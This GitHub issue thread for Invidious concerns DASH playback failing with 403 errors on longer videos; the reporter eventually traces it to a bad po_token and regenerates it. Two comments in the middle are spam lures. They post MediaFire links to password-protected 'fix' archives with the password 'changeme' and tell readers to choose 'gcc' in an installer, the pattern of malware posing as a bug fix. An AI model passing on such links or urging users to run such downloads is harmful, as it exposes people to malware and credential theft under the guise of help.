### ISSUE TITLE
[Bug] DASH playback shows "media could not be loaded" with videos longer than ~ 1 minute

### ISSUE THREAD

**Issue by alexmaras** [iv-org/invidious#4884]
**Describe the bug**
I've updated to the latest version after getting the "this helps our community" error.

Now, when using DASH, on videos longer than about a minute, I get the "media could not be loaded" error. The limit isn't exactly a minute, but anything over about 1:20 gets the error, I've tried dozens of videos to confirm this. The error shows up as soon as the page loads, but only for those videos with a runtime longer than a minute. The short videos play fine. 

I have:
- set up sig helper
- confirmed sig helper is handling the requests
- set up po_token and visitor_data using `quay.io/invidious/youtube-trusted-session-generator` on the same server with the same IP
- tried generating the po_token on different external IP - no change

I've also added some debug lines and compiled/run invidious with some custom stuff to see where it's getting to. It's the responses from `***.googlevideo.com/videoplayback` calls that 403. I've also confirmed that the calls to googlevideo endpoints include the `pot` and `n` query params with the values that came from the `po_token` and the sig-helper respectively.

Using non-dash mode works perfectly.

**Steps to Reproduce**
Unsure whether it's reproduceable - happy to help with any details though

**Logs**

```
"The media could not be loaded, either because the server or network failed or because the format is not supported."
```
Let me know if I should provide the 403 log lines from the container, and whether anything needs to be exclude from it. 

**Screenshots**
![image](https://github.com/user-attachments/assets/bff5b92d-6b76-4166-9d85-c55093a42d30)
![image](https://github.com/user-attachments/assets/258c894c-e98a-4b3b-8a33-dd620d4e6c3d)

**Additional context**

- using podman. I've confirmed that communication is successful through the chain, and didn't have issues before
- Running 3 containers for invidious that all connect to the same sig-helper with TCP - this is just to cover off restart times with my uptime setup. I've also tested with just one instance running and the same issue happens though.
- OS: Fedora server
- Browser: Firefox and Chromium show the issue, on all computers and multiple invidious accounts
- private instance, not exposed externally at all. Only one other user.
- Using a VPN as an outgoing connection, and have tried cycling to different endpoints with no change.

**Comment by littleblack666333** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by miniMuggle** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by alexmaras** [comment]
OK, it looks like this was an issue caused by my po_token. I had generated it correctly, but I tried again and noticed that on another network, I got a much _longer_ token output than before. About twice as long. 

I'm going to go over to the repo for the `quay.io/invidious/youtube-trusted-session-generator` docker container and see if I can provide any info that might help track down why this happened, but my DASH playback is now working with all videos. 

There's still an issue here, but I have luckily managed to generate a po_token that works. I'm guessing it's something on Youtubes' side trying to prevent the tokens being generated in invalid situations.
